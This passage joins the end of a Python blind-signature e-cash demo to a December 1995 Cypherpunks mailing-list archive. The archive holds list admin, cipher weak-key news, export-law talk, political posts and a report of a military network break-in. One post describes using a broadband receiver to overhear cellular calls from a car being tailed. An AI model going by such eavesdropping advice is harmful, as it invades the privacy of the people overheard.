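def coin_hash(serial: bytes) -> int:
    """Map a coin serial number to the integer the bank signs."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Bank:
    def __init__(self, balances):
        self.balances = dict(balances)
        self.withdrawal_log = []     # (account, blinded value): all the bank sees
        self.spent = set()           # serials that have already been deposited

    def withdraw(self, account: str, blinded: int) -> int:
        """Debit one unit and sign the blinded value without seeing the coin."""
        if self.balances.get(account, 0) < 1:
            raise ValueError("insufficient funds")
        self.balances[account] -= 1
        self.withdrawal_log.append((account, blinded))
        return pow(blinded, D, N)

    def deposit(self, account: str, serial: bytes, sig: int) -> str:
        """Credit one unit if the signature verifies and the serial is fresh."""
        if pow(sig, E, N) != coin_hash(serial):
            return "bad-signature"
        if serial in self.spent:
            return "double-spend"
        self.spent.add(serial)
        self.balances[account] = self.balances.get(account, 0) + 1
        return "accepted"


def blind(serial: bytes):
    """Buyer side: hide the coin hash behind a random factor r."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return (coin_hash(serial) * pow(r, E, N)) % N, r


def unblind(blind_sig: int, r: int) -> int:
    """Buyer side: strip r, leaving an ordinary signature on the coin hash."""
    return (blind_sig * pow(r, -1, N)) % N


def consistent_factor(blinded: int, serial: bytes) -> int:
    """Bank side: the r that would make `serial` the coin behind `blinded`.
    One exists for every serial, so a log entry singles out no coin."""
    return pow(blinded * pow(coin_hash(serial), -1, N) % N, D, N)


def run_demo():
    bank = Bank({"buyer": 2, "seller": 0})
    serial = secrets.token_bytes(16)            # coin chosen by the buyer
    blinded, r = blind(serial)
    sig = unblind(bank.withdraw("buyer", blinded), r)

    results = {
        "first": bank.deposit("seller", serial, sig),
        "copy": bank.deposit("seller", serial, sig),           # same coin again
        "forged": bank.deposit("seller", b"forged serial", sig),
        "log_hides_coin": coin_hash(serial)
        not in [b for _, b in bank.withdrawal_log],
    }
    # Unlinkability: an unrelated serial explains the same log entry equally
    # well, even for a bank that uses its own private key to look.
    other = b"some other coin"
    r2 = consistent_factor(blinded, other)
    results["other_coin_fits"] = (coin_hash(other) * pow(r2, E, N)) % N == blinded
    results["balances"] = dict(bank.balances)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The second deposit fails only because the bank checks its spent list at deposit time, so in this model the double-spending guarantee depends on the seller clearing the coin with the bank before treating payment as final.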






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Interserv Operations <postmaster@interserv.com>
Date: Wed, 20 Dec 1995 00:56:00 +0800
To: lbilling@interserv.com
Subject: Mailbox soft limit exceeded
Message-ID: <199512191618.IAA28242@m1.interserv.com>
MIME-Version: 1.0
Content-Type: text/plain


Your mailbox has exceeded the soft size limit of 8MB.  Mail will continue to be
delivered to your mailbox until it reaches the hard size limit of 15MB.  Please
remove unnecessary messages from your mailbox.

Additionally, if you're using CompuServe/Spry AirMail you may choose the local
inbox option which will download the mail from your remote inbox to your local
system inbox before allowing you to read it.

PLEASE NOTE: Use of the local inbox option will preclude accessing the 
             downloaded mail messages except from the system on which the
             messages were downloaded.

--

Interserv Network Operations Center		Postmaster@interserv.com
2001 6th Ave. Suite 3025B			noc@interserv.net
Seattle, WA. 95121				CompuServe/Internet Division




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Dec 1995 07:05:18 +0800
To: postmaster@ziff.com
Subject: Please help
Message-ID: <9512191501.AA05363@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Please help.  Somehow, someone signed up the "cypherpunks" mailing
list to your "ZD Net Update" electronic newsletter.  Our mailing list,
with over a thousand members, is for the discussion of cryptography
and technical means of achieving privacy and anonymity in the
emergent digital world.

There is some overlap between your publication and our mailing list,
which is why some well-meaning individual "signed us up."  It's pretty
slight, however, and interested parties can sign up individually.

So, please remove cypherpunks@toad.com from your mailing list.  As
always, if you have questions about the propriety of this, you can
follow the internet conventions of writing to postmaster@toad.com
to double-check.

Thanks.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 20 Dec 1995 02:57:02 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Political Cleanup program [NOISE]
In-Reply-To: <199512190442.UAA14637@ix3.ix.netcom.com>
Message-ID: <9512191622.AA13870@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I happen to believe in freedom of speech, especially political speech,
>and if you're not allowed to spend money broadcasting your speech or
>printing your messages, you don't have much freedom of press or speech.

It is very strange the way that "Libertarians" are so able to turn all
rights into property rights. Thus freedom of speech becomes freedom to have
influence on the political process in direct proportion to wealth.

I began work on the web in '92 because I saw its potential as a political tool 
which did not have the bias of wealth. It has the potential to create a new kind 
of political dialogue. When the Web becomes as ubiquitous as the telephone we 
will still see inequalities of power, the homeless and the poor will still be 
underrepresented. But that situation must be judged against our own where the 
political process can be bought and traded as if it were any other form of 
commodity.

It is not simply an issue of money, it is an issue of national security. If a 
foreigner were to control the majority of the media there would be a significant 
threat to the national interest. This threat has been realised in the UK with 
the coming to power of Rupert Murdoch. Fortunately his influence on the US
political scene has thus far been minor. In his own country he has brought down 
the government more than once.

>And as far as "prevent the political process from being owned by the rich" 
>goes, there have been brief exceptions over the last 5000 years in which
>the less-rich have overthrown the rich, but campaign finance laws have almost
>never kept the rich or the politicians from helping each other out.

In UK politics the influence of an individual's money is limited to influencing
one party. Even that is done behind closed doors. The other major parties both 
limit the size of individual contributions to a constituency party to a 
relatively nominal sum. $5000 is a huge sum in UK politics.

>I also don't believe freedom of speech should be limited by national 
>boundaries.

Nor do I. But I only vote in one country. If we take the question outside the US 
it would not on the whole be a good thing if the Prime Minister of Tobago (say) 
were provided with a campaign contribution of $1M by a foreign company with an 
interest in strip mining the entire island. Similarly it would be a bad thing if
Colombian drug lords were to make massive contributions to politicians committed
to continuing the prohibition on drugs.



		Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Fri, 22 Dec 1995 21:33:14 +0800
To: cypher@infinity.nus.sg
Subject: Your Majordomo request results
Message-ID: <9512221332.AA29343@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Your request of Majordomo was:
>>>> subscribe cypherpunks
Succeeded.
Your request of Majordomo was:
>>>> end
END OF COMMANDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Sat, 23 Dec 1995 19:25:58 +0800
To: cypher@infinity.nus.sg
Subject: Welcome to cypherpunks
Message-ID: <9512221333.AA29359@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cypherpunks mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command
in the body of your email message:

    unsubscribe cypherpunks Cypherpunks Mailing List <cypher@infinity.nus.sg>

Here's the general information for the list you've
subscribed to, in case you don't already have it:



About cypherpunks
-----------------

I. Administrivia (please read, boring though it may be)

The cypherpunks list is a forum for discussing personal defenses for
privacy in the digital domain.  It is a high volume mailing list.  If
you don't know how to do something, like unsubscribe, send mail to

	majordomo@toad.com

and the software robot which answers that address will send you back
instructions on how to do what you want.  If you don't know the
majordomo syntax, an empty message to this address will get you a help
file, as will a command 'help' in the body.  Even with all this
automated help, you may still encounter problems.  If you get really
stuck, please feel free to contact me directly at the address I use
for mailing list management:

	cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint:
if you try to unsubscribe yourself from a different account than you
signed up for, it likely won't work.  Log back into your old account
and try again.  If you no longer have access to that account, mail me
at the list management address above.  Also, please realize that 
there will be some cypherpunks messages "in transit" to you at the
time you unsubscribe.  If you get a response that says you are unsubscribed,
but the messages keep coming, wait a day and they should stop.

For other questions, my list management address is not the best place,
since I don't read it every day.  To reach me otherwise, send mail to

	eric@remailer.net

This address is appropriate for emergencies (and wanting to get off
the list is never an emergency), such as the list continuously spewing
articles.  Please don't send me mail to my regular mailbox asking to
be removed; I'll just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
-request address is made exactly for this purpose.

To post to the whole list, send mail to

	cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list.
Nothing personal, but I have to look at all the bounce messages.

There is no digest version available.

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and
important developments will be posted there.  Mail to

	cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All
announcements also go out to the full cypherpunks list, so there is no
need to subscribe to both.


II. About cypherpunks

The cypherpunks list is not designed for beginners, although they are
welcome.  If you are totally new to crypto, please get and read the
crypto FAQ referenced below.  This document is a good introduction,
although not short.  Crypto is a subtle field and a good understanding
will not come without some study.  Please, as a courtesy to all, do
some reading to make sure that your question is not already frequently
asked.

There are other forums to use on the subject of cryptography.  The
Usenet group sci.crypt deals with technical cryptography; cypherpunks
deals with technical details but slants the discussion toward their
social implications.  The Usenet group talk.politics.crypto, as it
says, is for political theorizing, and cypherpunks gets its share of
that, but cypherpunks is all pro-crypto; the debates on this list are
about how to best get crypto out there.  The Usenet group
alt.security.pgp is a pgp-specific group, and questions about pgp as
such are likely better asked there than here.  Ditto for
alt.security.ripem.

The cypherpunks list has its very own net.loon, a fellow named L.
Detweiler.  The history is too long for here, but he thinks that
cypherpunks are evil incarnate.  If you see a densely worded rant
featuring characteristic words such as "medusa", "pseudospoofing",
"treachery", "poison", or "black lies", it's probably him, no matter
what the From: line says.  The policy is to ignore these postings.
Replies have never, ever, not even once resulted in anything
constructive and usually create huge flamewars on the list.  Please,
please, don't feed the animals.


III. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is a good online intro to crypto.  Very much worth
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany.
There is a glossary there that all new members should download and
read.  Also recommended for all users are Hal Finney's instructions on
how to use the anonymous remailer system; the remailer sources are
there for the perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An
excellent overview of the field, it describes many of the basic
algorithms and protocols with their mathematical descriptions.  Some
of the stuff at the edges of the scope of the book is a little
incomplete, so short descriptions in here should lead to library
research for the latest papers, or to the list for the current
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.


IV. Famous last words

My preferred email address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

-----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated Mon Feb 21 13:18:25 1994]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Sat, 23 Dec 1995 04:30:20 +0800
To: prz@acm.org
Subject: Weak keys in Diamond Encryption Algorithm fixed.
Message-ID: <Pine.SUN.3.91.951222091711.7092B-100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


*******

There is a class of weak keys in the Diamond Encryption Algorithm.  These are
the ones that result in all of the individual substitution arrays being the
same.  This has a probability of about 2^-40 of happening, and is not the
basis of a practical attack, but it is interesting, anyway.  Thanks to
Colin Plumb for pointing this out. 

This weakness has been eliminated in the Diamond2 Encryption Algorithm.
See ftp://ftp.csn.net/mpj/public/diamond2.ps.gz for details.  If you are in
the USA or Canada, there is a reference implementation (as well as the above
document) in
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/diamond2.zip,
where the ??????? is revealed in ftp://ftp.csn.net/mpj/README along with
an export warning.

*******

I've also put an updated description of another algorithm, the Sapphire II
Stream Cipher, in ftp://ftp.csn.net/mpj/public/sapphire.ps.gz and a reference
implementation in
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/sapphire.zip

*******

DLOCK2.ZIP and SAPPHIRE.ZIP are also on the Colorado Catacombs BBS at
303-772-1062.

*******

You are invited to review the above algorithms and let me know if you find
any weakness in them.

*******

These are not commercial products, and this is not an advertisement.  This
is an electronic publication for the enjoyment of people who are interested
in cryptography for constructive purposes.

Merry Christmas!


                  ___________________________________________________________
                 |                                                           |
 |\  /| |        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
 | \/ |o|        | PO Box 1151, Longmont CO 80502-1151 USA   Jesus is alive! |
 |    | | /  _   | mpj@csn.org aka mpj@netcom.com m.p.johnson@ieee.org       |
 |    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
 |    |||\  (    | ftp://ftp.netcom.com/pub/mp/mpj/README  -. --- ----- .... |
 |    ||| \ \_/  | PGPprint=F2 5E A1 C1 A6 CF EF 71  12 1F 91 92 6A ED AE A9 |
                 |___________________________________________________________|

-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMNpaMfX0zg8FAL9FAQENjgQAoXP16Db9FdBuzRp1VXug3JWh7yCcHQCJ
X/t79/q512WGYWBIKznkczgfYNE7V94J2dhEP6EfKeZzVN2J5AHV4zqq7e9IWR49
FQakcZCyIrSJIJCpRk/cyMOX5zc1posAkAAhEka7nOd9n/GgW9mHPr57yFwNQgB4
e2wcSW1r9Oo=
=v8d3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 23 Dec 1995 04:29:48 +0800
To: cypherpunks@toad.com
Subject: Re: Attacking Clipper with timing info?
Message-ID: <2.2b7.32.19951222174145.008d7eb0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:49 AM 12/22/95 -0600, you wrote:

>Of course, if we did not pay taxes there would be no need to wonder if
>we're getting our money's worth.  A self-funded, for-profit NSA?  Now
>there's a libertarian idea if I ever heard one.

A similar concept has already been explored.  Check out
http://www.digicrime.com/

I am sure that a "for profit NSA" would be very similar in content and
substance to the company at that URL.

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Weld Pond" <weld@l0pht.com>
Date: Sun, 24 Dec 1995 05:30:55 +0800
To: cypherpunks@toad.com
Subject: Re: 900mhz digital phones
Message-ID: <199512232055.PAA01594@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


floyddb@alpha.c2.org:
>         There is a company called Optoelectronics that markets a
>         radio receiver
>          called the Interceptor.  This is a broad band (several
>          hundred MHz) device designed to lock on to the most
>          powerful signal around, regardless of frequency.  As
>          supplied, it only has a rubber duck antenna, but a
>          broadband, directional antenna (Log Periodic?) could be
>          attached.  There are AM and FM versions that output audio
>          and a version called the Scout that controls a scanner. 
>          These could have outboard devices hung on to them to decode
>          digital signals, record the conversation ... all for less
>          than $1000

I don't think that the  Interceptor is going to be much use with 
spread spectrum reception.  Unless you are really, really close to your 
target other non-ss signals are going to be much stronger.  

The freq range of the device is 30MHz-2GHz.  It is also legal to sell 
even though it is great at picking up the cellular phone 
conversations in the car you are tailing. There is also the plausible 
deniability in a device like this because you don't know what 
frequency you are listening to so you don't know if it is one of 
those "illegal ones".

A directional antenna isn't much use with a device like this because
it will pick up many other stronger signals that will overwhelm your
target transmission.  I am speaking of suburban or urban areas here.
This may work if you are in a rural region where there are no cell
towers, broadcast towers, or repeaters in use.

The Scout is just a frequency counter so you must have a scanner or
the Interceptor  to actually listen in. 

- Weld Pond - 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 23 Dec 1995 04:02:47 +0800
To: Jeff Gehlbach <jeffg@HiWAAY.net>
Subject: Re: Remote use=export?
In-Reply-To: <9512220547.AA27294@fly.HiWAAY.net>
Message-ID: <Pine.SOL.3.91.951222105847.4074A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Dec 1995, Jeff Gehlbach wrote:

> 
> Is granting use of crypto software running in the US to a remote user
> outside the US considered exportation?  For example, if I allow my friend in

Not export, but disclosure, and hence a violation. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sat, 23 Dec 1995 04:27:30 +0800
To: cypherpunks@toad.com
Subject: GAK shutdown?
Message-ID: <Pine.SUN.3.91.951222115252.19993A-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Last night I realized that NIST has been shut down since the
weekend...congratulations to Congress for a temporary halt to GAK!

-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Sat, 23 Dec 1995 04:11:00 +0800
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <9512221718.AA15130@all.net>
Message-ID: <55oht13r97.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Fred Cohen) said:

FC> Credible? No.  Accurate? Yes.  We all make mistakes, and whenever I
FC> find one that I've made, I try to admit it and fix it ASAP.  What's
FC> not credible is people who don't correct mistakes when they find
FC> them.

	Well, you corrected it, but you didn't admit it, at least not
here, and it makes people who made comments on the _original_ version
look like fools.  Next time when you quote a corrected article, please
note that it's been corrected.  The difference between an AF captain (4
years of service) and a Navy captain (17-ish years of service) is
substantial when judging whether they could be considered
'whizzkids' in this environment.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Sat, 23 Dec 1995 04:08:10 +0800
To: cypherpunks@toad.com
Subject: Re: Air Force hacks Navy? Eeeek!
In-Reply-To: <Pine.HPP.3.91.951221235554.6915A-100000@roboben.engr.ucdavis.edu>
Message-ID: <9512221714.AA13065@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


The following article is from Defense News Oct. 9-15, 1995 pp1,37.

Hacker Exposes U.S. Vulnerability
By Pat Cooper and Frank Oliveri
Defense News Staff Writers

Washington -- A U.S. Air Force captain, using a personal computer and a
modem, penetrated the command and control systems of U.S. Navy ships
operating in the Atlantic Ocean, exhibiting the awesome offensive
capability of information warfare and the significant danger U.S. forces
are just beginning to learn how to counter.

Air Force personnel based at Hanscom Air Force Base, Mass., with the
knowledge and permission of the Navy, penetrated the computer systems of
naval ships in the Atlantic Ocean, Air Force Lt. Gen. John Fairfield,
deputy chief of staff for command, control, communications and
computers, said Sept. 25.

Using standard computers, Air Force operators tapped into the Internet,
via a telephone link to the information superhighway, and connected with
a ship through an electronic mail link in one of the ships' networked
computers, Air Force Officials said Sept. 28.

Once inside the ship's computer network, Air Force Operators navigated
to the ship's command and control system and could have given the ship
bogus steering commands, Fairfield said.

The methods of the break-in and the actual vulnerabilities it exposed
are classified.

<lots more text>

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sat, 23 Dec 1995 04:02:35 +0800
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Subject: Re: Remote use=export?
In-Reply-To: <m0tT7SA-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <95Dec22.121656edt.1000@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Jeff Gehlbach writes:
> 
> : -----BEGIN PGP SIGNED MESSAGE-----
> : 
> : I apologize if this is a dead horse, but...
> : 
> : Is granting use of crypto software running in the US to a remote user
> : outside the US considered exportation?  For example, if I allow my friend in
> : Paris to use a PGP binary residing and running on my PC in Washington, is
> : either of us violating any ITAR or similar restrictions?
> 
> Nothing about the ITAR is unambiguous, but since what is forbidden is
> ``exporting'', which includes ``disclosing to foreign persons'', and
> since use is not forbidden, it is hard to see how what you suggest
> could violate the ITAR.  (And I don't know of any other U.S. law or
> regulation that it could violate.)

If memory serves, Digital Equipment Corp was obliged to remove a
demonstration supercomputer from the net.  The argument was that
Iraqis could telnet into it (it had free guest accounts) and run
nuclear weapons simulations on it.  Some of the list members
probably remember the details.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 04:25:53 +0800
To: dreschs@austnsc.tandem.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <55vin93uyk.fsf@galil.austnsc.tandem.com>
Message-ID: <9512221718.AA15130@all.net>
MIME-Version: 1.0
Content-Type: text


> On Cypherpunks, fc@all.net (Dr. Frederick B. Cohen) said:
> 
...
> 	Strange, Dr Fred, this isn't the 'actual text' I saw quoted in
> RISKS Digest - did you 'fix' it so that it was a bit more credible?
> 
> Dr Fred's paragraph:
> 
> FBC> 100% wrong - he was an insider, he had a great deal of assitance,
> FBC> he had cryptographic devices and keys, and he had special insider
> FBC> knowledge.  If he was an Air Force captain, he could not have been
> FBC> all that young.  Whizzkids are usually considered teenagers.
> FBC> Anyone know of any teenaged AF captains these days?
> 
> RISKS Digest's paragraph:
> 
> RISKS> 100% wrong - he was an insider, he had a great deal of
> RISKS> assistance, he had cryptographic devices and keys, and he had
> RISKS> special insider knowledge.  If he was a Navy captain, he could
> RISKS> not have been all that young.  Whizzkids are usually considered
> RISKS> teenagers.  Anyone know of any teenaged Navy captains?

Credible? No.  Accurate? Yes.  We all make mistakes, and whenever I find
one that I've made, I try to admit it and fix it ASAP.  What's not
credible is people who don't correct mistakes when they find them. 

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 23 Dec 1995 05:06:34 +0800
To: cypherpunks@toad.com
Subject: Re: taking electronic privacy into our own hands
Message-ID: <199512222026.MAA21559@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995, Eric Anderson wrote:

> 	Would it be possible to write a program ( i.e. a worm or
> Trojan) to ferret out personal information that is stored in databases
> and encrypt it?
>
> I was just wondering what such an undertaking would entail.

Actually, there is no need to write any such code.

AT&T distributes just such a beast to any and all comers.  It can take
personal information and send it out over a secure socket layer.

I think a couple of partners in crime, Cheswick and Bellovin of AT&T
research had a hand in its continuing distribution.

> Eric


Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 23 Dec 1995 06:40:25 +0800
To: cypherpunks@toad.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
Message-ID: <199512222111.NAA24171@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Just in case anyone missed this yesterday, I thought I'd
renominate AT&T & Netscape for the:

          *** 1995 CHRISTMAS NET SCROOGE ***

                    *** AWARD ***

    (T-shirt sales coming soon, to a website near you ...)

                     ------------

Alice here ...

Back on Tue, 19 Dec 1995, I wrote:

>>>Can anyone tell me whether Ian Goldberg and David Wagner got their
>>>$25,000 from Netscape for finding the HUGE security flaws in Netscape's
>>>existing product line??
>>>
>> >I can't remember whether they got anything or not ...
>> 
>> That would be no (well, except for the nifty T-shirt from Sameer; Thanks!).
> 
> Not anything??  That's shameful ... where on earth are the values in 
> America, today?  

Everyone should ask this question.  AT&T can sign-on to a two-page ad,
calling on Congress to balance the budget -- to cut off veterans, and
cut-off women with dependent children just before Christmas.  It can
sign on to this, but it can't bother to even offer a scholarship to
the students who helped make its fortunes.  It would rather leave the
impression that it freeloads off of others' efforts.

It's shameful.

> AT&T and Netscape have jointly made a small fortune distributing this
> product, and yet NEITHER company feels that the software engineers who
> "voluntarily" made a difference -- a couple of students -- deserve
> even a wooden nickel for the ideas which were used.
> 
> It's absolutely shameful.  But then, I guess that AT&T and Netscape
> have no shame at all.
> 
> They just steal "intellectual property" from students, and don't even
> pay a token amount.
> 
> And people wonder what's wrong with America?

Luckily for those of us who don't live in the United States, we can
perhaps look at that country and truly wonder what is going on over
there, and what is wrong with America?

Where are the values amongst ALL Americans, not just Netscape and
AT&T?  What are the role models that all the leaders -- business,
sports, and political leaders -- show to the national youth?

Here is all I've seen (as a foreigner), over the last while:

Enid Greene Waldholtz blubbering in a news conference about how she as
a congress person certainly COULDN'T be expected to resign after
winning her election with stolen money.  Blubbering for five hours
straight (except when she had to stop to turn a page, I mean) ... She
certainly said that "leadership" is all about playing "victim".  Poor
little Enid. (And even worse, she was _defended_ by Susan Molinari.)

Bob Dole, deciding to go to Bosnia.  The former WW II veteran
willingly jeopardizing the lives of American boys -- boys who have put
their lives on the line in a _volunteer_ armed force -- all for a
lousy political photo-op.  The chance to say ... "hey look at me, I'm
here in Bosnia."  Someone who's willing to overrule the Pentagon's own
most diplomatic advice on how complex an operation this actually is.

And then there is AT&T.  A company whose Chairman can publish a letter
which calls on Congress to cut off checks to mothers with dependent
children and war veterans days before Christmas, all while stealing
and freeloading off of the work of some students.

Scrooge ... take heart.

Here's Holiday wish #1.  Enid do the right thing ... resign.  Say the
"right thing" and say that your child -- the future and the delayed
gratification that the future brings -- is much more important than
your own personal PRESENT political aspirations.

Here's Holiday wish #2.  Bob, lots of people worked their asses off to
make sure that the American fighter pilot, and the two French fighter
pilots could be rescued from Bosnia.  If you want to go and get some
photo-ops, go to Germany or Italy, and give one hell of a vote of
support to the boys that are there -- a support which could just as
easily have been given and should be given in Congress.  A _real_
strong unfettered commitment.

And here's Holiday wish #3.  AT&T.  Do the right thing.  Reward those
people who help make you a fortune.  Stand tall as an example, rather
than as an embarrassment to the nation.  You've ignored this for so
long now, that you've almost dug your own grave.  But you still have a
chance to save face.  Have the courage to take the chance when it's
offered.  Simply say that the proposal to reward David Wagner and Ian
Goldberg -- some holiday mad money and scholarships -- was lost in
committee, and approval processes -- but it WAS in the works, and it
was recommended and can now be announced just before Christmas, as a
rightful reward.

Some holiday cheer.

Will people think it's a cynical attempt at manipulation?  Yep.  But
it's a darned sight better than the alternatives -- especially when you
look at possible future outcomes.  Trust me, this is far better than
calling for veterans and single mothers with children to be cut-off
just before the holidays.

Perhaps, Enid, Bob, and AT&T will all learn when to use offense and
when to use defense.  They might also learn that the best offense is a
good defense.  They might even begin to look at what "courage" truly
is, and of how difficult it can be for anyone to do the "right thing",
especially when they think that they're surrounded by minefields.  

Even when the "right thing" is in your own best interest, you not only
have to be shown the right path to take, but you have to have the
motivation and courage to make the move and take action.

Enid, Bob, and AT&T, take note.

Hopefully for the holidays, everyone finds the courage to neutralize
some portion of the vulnerability spectrum they've placed themselves
in.

> >   - Ian "There's a reason people talk about `starving grad students'..."
> > 


Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Fri, 22 Dec 1995 22:33:49 +0800
To: cypherpunks@toad.com
Subject: PGP timeline FAQ... comments requested
Message-ID: <297.9512221337@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



There seems to be much confusion amongst some of the newer users of
PGP who frequent alt.security.pgp, and recently whilst delving in to
give my version of how it happened my post got longer and longer,
until it grew on the spur of the moment into a sort of FAQ.  I got a
few comments, and corrections from that post, but I thought there are
likely to be people who know more anecdotes and were around at the
